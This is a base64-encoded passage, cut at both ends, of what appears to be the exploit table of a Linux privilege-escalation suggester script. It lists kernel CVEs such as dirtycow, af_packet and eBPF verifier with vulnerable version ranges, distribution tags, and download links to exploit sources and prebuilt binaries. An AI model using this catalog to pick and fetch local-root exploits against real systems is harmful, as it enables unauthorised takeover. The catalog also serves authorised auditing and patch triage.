MjAxNC8wMy9leHBsb2l0LUNWRS0yMDE0LTAwMzgteDMyLXJlY3ZtbXNnLWtlcm5lbC12dWxuZXJhYmxpdHkuaHRtbApleHBsb2l0LWRiOiAzMTM0NwpDb21tZW50czogQ09ORklHX1g4Nl9YMzIgbmVlZHMgdG8gYmUgZW5hYmxlZApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE0LTAxOTZdJHt0eHRyc3R9IHJhd21vZGVQVFkKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4zMSx2ZXI8PTMuMTQuMwpUYWdzOgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL2Jsb2cuaW5jbHVkZXNlY3VyaXR5LmNvbS8yMDE0LzA2L2V4cGxvaXQtd2Fsa3Rocm91Z2gtY3ZlLTIwMTQtMDE5Ni1wdHkta2VybmVsLXJhY2UtY29uZGl0aW9uLmh0bWwKZXhwbG9pdC1kYjogMzM1MTYKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNC0yODUxXSR7dHh0cnN0fSB1c2UtYWZ0ZXItZnJlZSBpbiBwaW5nX2luaXRfc29jaygpICR7YmxkYmx1fShEb1MpJHt0eHRyc3R9ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjAuMSx2ZXI8PTMuMTQKVGFnczogClJhbms6IDAKYW5hbHlzaXMtdXJsOiBodHRwczovL2N5c2VjbGFicy5jb20vcGFnZT9uPTAyMDEyMDE2CmV4cGxvaXQtZGI6IDMyOTI2CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTQtNDAxNF0ke3R4dHJzdH0gaW5vZGVfY2FwYWJsZQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4wLjEsdmVyPD0zLjEzClRhZ3M6IHVidW50dT0xMi4wNApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3d3dy5vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTQvMDYvMTAvNApleHBsb2l0LWRiOiAzMzgyNApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE0LTQ2OTldJHt0eHRyc3R9IHB0cmFjZS9zeXNyZXQKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTMuMC4xLHZlcjw9My44ClRhZ3M6IHVidW50dT0xMi4wNApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3d3dy5vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTQvMDcvMDgvMTYKZXhwbG9pdC1kYjogMzQxMzQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNC00OTQzXSR7dHh0cnN0fSBQUFBvTDJUUCAke2JsZGJsdX0oRG9TKSR7dHh0cnN0fQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4yLHZlcjw9My4xNS42ClRhZ3M6IApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9jeXNlY2xhYnMuY29tL3BhZ2U/bj0wMTEwMjAxNQpleHBsb2l0LWRiOiAzNjI2NwpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE0LTUyMDddJHt0eHRyc3R9IGZ1c2Vfc3VpZApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4wLjEsdmVyPD0zLjE2LjEKVGFnczogClJhbms6IDEKZXhwbG9pdC1kYjogMzQ5MjMKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS05MzIyXSR7dHh0cnN0fSBCYWRJUkVUClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjAuMSx2ZXI8My4xNy41LHg4Nl82NApUYWdzOiBSSEVMPD03LGZlZG9yYT0yMApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL2xhYnMuYnJvbWl1bS5jb20vMjAxNS8wMi8wMi9leHBsb2l0aW5nLWJhZGlyZXQtdnVsbmVyYWJpbGl0eS1jdmUtMjAxNC05MzIyLWxpbnV4LWtlcm5lbC1wcml2aWxlZ2UtZXNjYWxhdGlvbi8Kc3JjLXVybDogaHR0cDovL3NpdGUucGkzLmNvbS5wbC9leHAvcF9jdmUtMjAxNC05MzIyLnRhci5negpleHBsb2l0LWRiOgphdXRob3I6IFJhZmFsICduM3JnYWwnIFdvanRjenVrICYgQWRhbSAncGkzJyBaYWJyb2NraQpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE1LTMyOTBdJHt0eHRyc3R9IGVzcGZpeDY0X05NSQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4xMyx2ZXI8NC4xLjYseDg2XzY0ClRhZ3M6IApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3d3dy5vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTUvMDgvMDQvOApleHBsb2l0LWRiOiAzNzcyMgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W04vQV0ke3R4dHJzdH0gYmx1ZXRvb3RoClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPD0yLjYuMTEKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiA0NzU2CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTUtMTMyOF0ke3R4dHJzdH0gb3ZlcmxheWZzClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjEzLjAsdmVyPD0zLjE5LjAKVGFnczogdWJ1bnR1PSgxMi4wNHwxNC4wNCl7a2VybmVsOjMuMTMuMC0oMnwzfDR8NSkqLWdlbmVyaWN9LHVidW50dT0oMTQuMTB8MTUuMDQpe2tlcm5lbDozLigxM3wxNikuMC0qLWdlbmVyaWN9ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vc2VjbGlzdHMub3JnL29zcy1zZWMvMjAxNS9xMi83MTcKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjMxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvb2ZzXzMyCmJpbi11cmw6IGh0dHBzOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDE2MDYwMjE5MjYzMS9odHRwczovL3d3dy5rZXJuZWwtZXhwbG9pdHMuY29tL21lZGlhL29mc182NApleHBsb2l0LWRiOiAzNzI5MgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE1LTg2NjBdJHt0eHRyc3R9IG92ZXJsYXlmcyAob3ZsX3NldGF0dHIpClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjAuMCx2ZXI8PTQuMy4zClRhZ3M6ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vd3d3LmhhbGZkb2cubmV0L1NlY3VyaXR5LzIwMTUvVXNlck5hbWVzcGFjZU92ZXJsYXlmc1NldHVpZFdyaXRlRXhlYy8KZXhwbG9pdC1kYjogMzkyMzAKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS04NjYwXSR7dHh0cnN0fSBvdmVybGF5ZnMgKG92bF9zZXRhdHRyKQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4wLjAsdmVyPD00LjMuMwpUYWdzOiB1YnVudHU9KDE0LjA0fDE1LjEwKXtrZXJuZWw6NC4yLjAtKDE4fDE5fDIwfDIxfDIyKS1nZW5lcmljfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3d3dy5oYWxmZG9nLm5ldC9TZWN1cml0eS8yMDE1L1VzZXJOYW1lc3BhY2VPdmVybGF5ZnNTZXR1aWRXcml0ZUV4ZWMvCmV4cGxvaXQtZGI6IDM5MTY2CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTYtMDcyOF0ke3R4dHJzdH0ga2V5cmluZwpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4xMCx2ZXI8NC40LjEKVGFnczoKUmFuazogMAphbmFseXNpcy11cmw6IGh0dHA6Ly9wZXJjZXB0aW9uLXBvaW50LmlvLzIwMTYvMDEvMTQvYW5hbHlzaXMtYW5kLWV4cGxvaXRhdGlvbi1vZi1hLWxpbnV4LWtlcm5lbC12dWxuZXJhYmlsaXR5LWN2ZS0yMDE2LTA3MjgvCmV4cGxvaXQtZGI6IDQwMDAzCkNvbW1lbnRzOiBFeHBsb2l0IHRha2VzIGFib3V0IH4zMCBtaW51dGVzIHRvIHJ1bi4gRXhwbG9pdCBpcyBub3QgcmVsaWFibGUsIHNlZTogaHR0cHM6Ly9jeXNlY2xhYnMuY29tL2Jsb2cvY3ZlLTIwMTYtMDcyOC1wb2Mtbm90LXdvcmtpbmcKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi0yMzg0XSR7dHh0cnN0fSB1c2ItbWlkaQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4wLjAsdmVyPD00LjQuOApUYWdzOiB1YnVudHU9MTQuMDQsZmVkb3JhPTIyClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3hhaXJ5LmdpdGh1Yi5pby9ibG9nLzIwMTYvY3ZlLTIwMTYtMjM4NApzcmMtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20veGFpcnkva2VybmVsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAxNi0yMzg0L3BvYy5jCmV4cGxvaXQtZGI6IDQxOTk5CkNvbW1lbnRzOiBSZXF1aXJlcyBhYmlsaXR5IHRvIHBsdWcgaW4gYSBtYWxpY2lvdXMgVVNCIGRldmljZSBhbmQgdG8gZXhlY3V0ZSBhIG1hbGljaW91cyBiaW5hcnkgYXMgYSBub24tcHJpdmlsZWdlZCB1c2VyCmF1dGhvcjogQW5kcmV5ICd4YWlyeScgS29ub3ZhbG92CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTYtNDk5N10ke3R4dHJzdH0gdGFyZ2V0X29mZnNldApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49NC40LjAsdmVyPD00LjQuMCxjbWQ6Z3JlcCAtcWkgaXBfdGFibGVzIC9wcm9jL21vZHVsZXMKVGFnczogdWJ1bnR1PTE2LjA0e2tlcm5lbDo0LjQuMC0yMS1nZW5lcmljfQpSYW5rOiAxCnNyYy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9vZmZlbnNpdmUtc2VjdXJpdHkvZXhwbG9pdC1kYXRhYmFzZS1iaW4tc3Bsb2l0cy9yYXcvbWFzdGVyL2Jpbi1zcGxvaXRzLzQwMDUzLnppcApDb21tZW50czogaXBfdGFibGVzLmtvIG5lZWRzIHRvIGJlIGxvYWRlZApleHBsb2l0LWRiOiA0MDA0OQphdXRob3I6IFZpdGFseSAndm5paycgTmlrb2xlbmtvCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTYtNDU1N10ke3R4dHJzdH0gZG91YmxlLWZkcHV0KCkKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTQuNCx2ZXI8NC41LjUsQ09ORklHX0JQRl9TWVNDQUxMPXksc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfYnBmX2Rpc2FibGVkIT0xClRhZ3M6IHVidW50dT0xNi4wNHtrZXJuZWw6NC40LjAtMjEtZ2VuZXJpY30KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vYnVncy5jaHJvbWl1bS5vcmcvcC9wcm9qZWN0LXplcm8vaXNzdWVzL2RldGFpbD9pZD04MDgKc3JjLXVybDogaHR0cHM6Ly9naXRodWIuY29tL29mZmVuc2l2ZS1zZWN1cml0eS9leHBsb2l0LWRhdGFiYXNlLWJpbi1zcGxvaXRzL3Jhdy9tYXN0ZXIvYmluLXNwbG9pdHMvMzk3NzIuemlwCkNvbW1lbnRzOiBDT05GSUdfQlBGX1NZU0NBTEwgbmVlZHMgdG8gYmUgc2V0ICYmIGtlcm5lbC51bnByaXZpbGVnZWRfYnBmX2Rpc2FibGVkICE9IDEKZXhwbG9pdC1kYjogNDA3NTkKYXV0aG9yOiBKYW5uIEhvcm4KRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi01MTk1XSR7dHh0cnN0fSBkaXJ0eWNvdwpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjIyLHZlcjw9NC44LjMKVGFnczogZGViaWFuPTd8OCxSSEVMPTV7a2VybmVsOjIuNi4oMTh8MjR8MzMpLSp9LFJIRUw9NntrZXJuZWw6Mi42LjMyLSp8My4oMHwyfDZ8OHwxMCkuKnwyLjYuMzMuOS1ydDMxfSxSSEVMPTd7a2VybmVsOjMuMTAuMC0qfDQuMi4wLTAuMjEuZWw3fSx1YnVudHU9MTYuMDR8MTQuMDR8MTIuMDQKUmFuazogNAphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9kaXJ0eWNvdy9kaXJ0eWNvdy5naXRodWIuaW8vd2lraS9WdWxuZXJhYmlsaXR5RGV0YWlscwpDb21tZW50czogRm9yIFJIRUwvQ2VudE9TIHNlZSBleGFjdCB2dWxuZXJhYmxlIHZlcnNpb25zIGhlcmU6IGh0dHBzOi8vYWNjZXNzLnJlZGhhdC5jb20vc2l0ZXMvZGVmYXVsdC9maWxlcy9yaC1jdmUtMjAxNi01MTk1XzUuc2gKZXhwbG9pdC1kYjogNDA2MTEKYXV0aG9yOiBQaGlsIE9lc3RlcgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE2LTUxOTVdJHt0eHRyc3R9IGRpcnR5Y293IDIKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4yMix2ZXI8PTQuOC4zClRhZ3M6IGRlYmlhbj03fDgsUkhFTD01fDZ8Nyx1YnVudHU9MTQuMDR8MTIuMDQsdWJ1bnR1PTEwLjA0e2tlcm5lbDoyLjYuMzItMjEtZ2VuZXJpY30sdWJ1bnR1PTE2LjA0e2tlcm5lbDo0LjQuMC0yMS1nZW5lcmljfQpSYW5rOiA0CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL2RpcnR5Y293L2RpcnR5Y293LmdpdGh1Yi5pby93aWtpL1Z1bG5lcmFiaWxpdHlEZXRhaWxzCmV4dC11cmw6IGh0dHBzOi8vd3d3LmV4cGxvaXQtZGIuY29tL2Rvd25sb2FkLzQwODQ3CkNvbW1lbnRzOiBGb3IgUkhFTC9DZW50T1Mgc2VlIGV4YWN0IHZ1bG5lcmFibGUgdmVyc2lvbnMgaGVyZTogaHR0cHM6Ly9hY2Nlc3MucmVkaGF0LmNvbS9zaXRlcy9kZWZhdWx0L2ZpbGVzL3JoLWN2ZS0yMDE2LTUxOTVfNS5zaApleHBsb2l0LWRiOiA0MDgzOQphdXRob3I6IEZpcmVGYXJ0IChhdXRob3Igb2YgZXhwbG9pdCBhdCBFREIgNDA4MzkpOyBHYWJyaWVsZSBCb25hY2luaSAoYXV0aG9yIG9mIGV4cGxvaXQgYXQgJ2V4dC11cmwnKQpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE2LTg2NTVdJHt0eHRyc3R9IGNob2NvYm9fcm9vdApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49NC40LjAsdmVyPDQuOSxDT05GSUdfVVNFUl9OUz15LHN5c2N0bDprZXJuZWwudW5wcml2aWxlZ2VkX3VzZXJuc19jbG9uZT09MQpUYWdzOiB1YnVudHU9KDE0LjA0fDE2LjA0KXtrZXJuZWw6NC40LjAtKDIxfDIyfDI0fDI4fDMxfDM0fDM2fDM4fDQyfDQzfDQ1fDQ3fDUxKS1nZW5lcmljfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3d3dy5vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTYvMTIvMDYvMQpDb21tZW50czogQ0FQX05FVF9SQVcgY2FwYWJpbGl0eSBpcyBuZWVkZWQgT1IgQ09ORklHX1VTRVJfTlM9eSBuZWVkcyB0byBiZSBlbmFibGVkCmJpbi11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yYXBpZDcvbWV0YXNwbG9pdC1mcmFtZXdvcmsvbWFzdGVyL2RhdGEvZXhwbG9pdHMvQ1ZFLTIwMTYtODY1NS9jaG9jb2JvX3Jvb3QKZXhwbG9pdC1kYjogNDA4NzEKYXV0aG9yOiByZWJlbApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE2LTk3OTNdJHt0eHRyc3R9IFNPX3tTTkR8UkNWfUJVRkZPUkNFClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjExLHZlcjw0LjguMTQsQ09ORklHX1VTRVJfTlM9eSxzeXNjdGw6a2VybmVsLnVucHJpdmlsZWdlZF91c2VybnNfY2xvbmU9PTEKVGFnczoKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS94YWlyeS9rZXJuZWwtZXhwbG9pdHMvdHJlZS9tYXN0ZXIvQ1ZFLTIwMTYtOTc5MwpzcmMtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20veGFpcnkva2VybmVsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAxNi05NzkzL3BvYy5jCkNvbW1lbnRzOiBDQVBfTkVUX0FETUlOIGNhcHMgT1IgQ09ORklHX1VTRVJfTlM9eSBuZWVkZWQuIE5vIFNNRVAvU01BUC9LQVNMUiBieXBhc3MgaW5jbHVkZWQuIFRlc3RlZCBpbiBRRU1VIG9ubHkKZXhwbG9pdC1kYjogNDE5OTUKYXV0aG9yOiBBbmRyZXkgJ3hhaXJ5JyBLb25vdmFsb3YKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNy02MDc0XSR7dHh0cnN0fSBkY2NwClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTgsdmVyPD00LjkuMTEsQ09ORklHX0lQX0RDQ1A9W215XQpUYWdzOiB1YnVudHU9KDE0LjA0fDE2LjA0KXtrZXJuZWw6NC40LjAtNjItZ2VuZXJpY30KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly93d3cub3BlbndhbGwuY29tL2xpc3RzL29zcy1zZWN1cml0eS8yMDE3LzAyLzIyLzMKQ29tbWVudHM6IFJlcXVpcmVzIEtlcm5lbCBiZSBidWlsdCB3aXRoIENPTkZJR19JUF9EQ0NQIGVuYWJsZWQuIEluY2x1ZGVzIHBhcnRpYWwgU01FUC9TTUFQIGJ5cGFzcwpleHBsb2l0LWRiOiA0MTQ1OAphdXRob3I6IEFuZHJleSAneGFpcnknIEtvbm92YWxvdgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE3LTczMDhdJHt0eHRyc3R9IGFmX3BhY2tldApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4yLHZlcjw9NC4xMC42LENPTkZJR19VU0VSX05TPXksc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfdXNlcm5zX2Nsb25lPT0xClRhZ3M6IHVidW50dT0xNi4wNHtrZXJuZWw6NC44LjAtKDM0fDM2fDM5fDQxfDQyfDQ0fDQ1KS1nZW5lcmljfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9nb29nbGVwcm9qZWN0emVyby5ibG9nc3BvdC5jb20vMjAxNy8wNS9leHBsb2l0aW5nLWxpbnV4LWtlcm5lbC12aWEtcGFja2V0Lmh0bWwKc3JjLXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3hhaXJ5L2tlcm5lbC1leHBsb2l0cy9tYXN0ZXIvQ1ZFLTIwMTctNzMwOC9wb2MuYwpleHQtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vYmNvbGVzL2tlcm5lbC1leHBsb2l0cy9tYXN0ZXIvQ1ZFLTIwMTctNzMwOC9wb2MuYwpDb21tZW50czogQ0FQX05FVF9SQVcgY2FwIG9yIENPTkZJR19VU0VSX05TPXkgbmVlZGVkLiBNb2RpZmllZCB2ZXJzaW9uIGF0ICdleHQtdXJsJyBhZGRzIHN1cHBvcnQgZm9yIGFkZGl0aW9uYWwga2VybmVscwpiaW4tdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmFwaWQ3L21ldGFzcGxvaXQtZnJhbWV3b3JrL21hc3Rlci9kYXRhL2V4cGxvaXRzL2N2ZS0yMDE3LTczMDgvZXhwbG9pdApleHBsb2l0LWRiOiA0MTk5NAphdXRob3I6IEFuZHJleSAneGFpcnknIEtvbm92YWxvdiAob3JnaW5hbCBleHBsb2l0IGF1dGhvcik7IEJyZW5kYW4gQ29sZXMgKGF1dGhvciBvZiBleHBsb2l0IHVwZGF0ZSBhdCAnZXh0LXVybCcpCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMTY5OTVdJHt0eHRyc3R9IGVCUEZfdmVyaWZpZXIKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTQuNCx2ZXI8PTQuMTQuOCxDT05GSUdfQlBGX1NZU0NBTEw9eSxzeXNjdGw6a2VybmVsLnVucHJpdmlsZWdlZF9icGZfZGlzYWJsZWQhPTEKVGFnczogZGViaWFuPTkuMHtrZXJuZWw6NC45LjAtMy1hbWQ2NH0sZmVkb3JhPTI1fDI2fDI3LHVidW50dT0xNC4wNHtrZXJuZWw6NC40LjAtODktZ2VuZXJpY30sdWJ1bnR1PSgxNi4wNHwxNy4wNCl7a2VybmVsOjQuKDh8MTApLjAtKDE5fDI4fDQ1KS1nZW5lcmljfQpSYW5rOiA1CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9yaWNrbGFyYWJlZS5ibG9nc3BvdC5jb20vMjAxOC8wNy9lYnBmLWFuZC1hbmFseXNpcy1vZi1nZXQtcmVrdC1saW51eC5odG1sCkNvbW1lbnRzOiBDT05GSUdfQlBGX1NZU0NBTEwgbmVlZHMgdG8gYmUgc2V0ICYmIGtlcm5lbC51bnByaXZpbGVnZWRfYnBmX2Rpc2FibGVkICE9IDEKYmluLXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3JhcGlkNy9tZXRhc3Bsb2l0LWZyYW1ld29yay9tYXN0ZXIvZGF0YS9leHBsb2l0cy9jdmUtMjAxNy0xNjk5NS9leHBsb2l0Lm91dApleHBsb2l0LWRiOiA0NTAxMAphdXRob3I6IFJpY2sgTGFyYWJlZQpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE3LTEwMDAxMTJdJHt0eHRyc3R9IE5FVElGX0ZfVUZPClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj00LjQsdmVyPD00LjEzLENPTkZJR19VU0VSX05TPXksc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfdXNlcm5zX2Nsb25lPT0xClRhZ3M6IHVidW50dT0xNC4wNHtrZXJuZWw6NC40LjAtKn0sdWJ1bnR1PTE2LjA0e2tlcm5lbDo0LjguMC0qfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3d3dy5vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTcvMDgvMTMvMQpzcmMtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20veGFpcnkva2VybmVsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAxNy0xMDAwMTEyL3BvYy5jCmV4dC11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9iY29sZXMva2VybmVsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAxNy0xMDAwMTEyL3BvYy5jCkNvbW1lbnRzOiBDQVBfTkVUX0FETUlOIGNhcCBvciBDT05GSUdfVVNFUl9OUz15IG5lZWRlZC4gU01FUC9LQVNMUiBieXBhc3MgaW5jbHVkZWQuIE1vZGlmaWVkIHZlcnNpb24gYXQgJ2V4dC11cmwnIGFkZHMgc3VwcG9ydCBmb3IgYWRkaXRpb25hbCBkaXN0cm9zL2tlcm5lbHMKYmluLXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3JhcGlkNy9tZXRhc3Bsb2l0LWZyYW1ld29yay9tYXN0ZXIvZGF0YS9leHBsb2l0cy9jdmUtMjAxNy0xMDAwMTEyL2V4cGxvaXQub3V0CmV4cGxvaXQtZGI6CmF1dGhvcjogQW5kcmV5ICd4YWlyeScgS29ub3ZhbG92IChvcmdpbmFsIGV4cGxvaXQgYXV0aG9yKTsgQnJlbmRhbiBDb2xlcyAoYXV0aG9yIG9mIGV4cGxvaXQgdXBkYXRlIGF0ICdleHQtdXJsJykKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNy0xMDAwMjUzXSR7dHh0cnN0fSBQSUVfc3RhY2tfY29ycnVwdGlvbgpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4yLHZlcjw9NC4xMyx4ODZfNjQKVGFnczogUkhFTD02LFJIRUw9N3trZXJuZWw6My4xMC4wLTUxNC4yMS4yfDMuMTAuMC01MTQuMjYuMX0KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LnF1YWx5cy5jb20vMjAxNy8wOS8yNi9saW51eC1waWUtY3ZlLTIwMTctMTAwMDI1My9jdmUtMjAxNy0xMDAwMjUzLnR4dApzcmMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMTcvMDkvMjYvbGludXgtcGllLWN2ZS0yMDE3LTEwMDAyNTMvY3ZlLTIwMTctMTAwMDI1My5jCmV4cGxvaXQtZGI6IDQyODg3CmF1dGhvcjogUXVhbHlzCkNvbW1lbnRzOgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE4LTUzMzNdJHt0eHRyc3R9IHJkc19hdG9taWNfZnJlZV9vcCBOVUxMIHBvaW50ZXIgZGVyZWZlcmVuY2UKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTQuNCx2ZXI8PTQuMTQuMTMsY21kOmdyZXAgLXFpIHJkcyAvcHJvYy9tb2R1bGVzLHg4Nl82NApUYWdzOiB1YnVudHU9MTYuMDR7a2VybmVsOjQuNC4wfDQuOC4wfQpSYW5rOiAxCnNyYy11cmw6IGh0dHBzOi8vZ2lzdC5naXRodWJ1c2VyY29udGVudC5jb20vd2Jvd2xpbmcvOWQzMjQ5MmJkOTZkOWU3YzNiZjUyZTIzYTBhYzMwYTQvcmF3Lzk1OTMyNTgxOWM3ODI0OGE2NDM3MTAyYmIyODliYjg1NzhhMTM1Y2QvY3ZlLTIwMTgtNTMzMy1wb2MuYwpleHQtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vYmNvbGVzL2tlcm5lbC1leHBsb2l0cy9tYXN0ZXIvQ1ZFLTIwMTgtNTMzMy9jdmUtMjAxOC01MzMzLmMKQ29tbWVudHM6IHJkcy5rbyBrZXJuZWwgbW9kdWxlIG5lZWRzIHRvIGJlIGxvYWRlZC4gTW9kaWZpZWQgdmVyc2lvbiBhdCAnZXh0LXVybCcgYWRkcyBzdXBwb3J0IGZvciBhZGRpdGlvbmFsIHRhcmdldHMgYW5kIGJ5cGFzc2luZyBLQ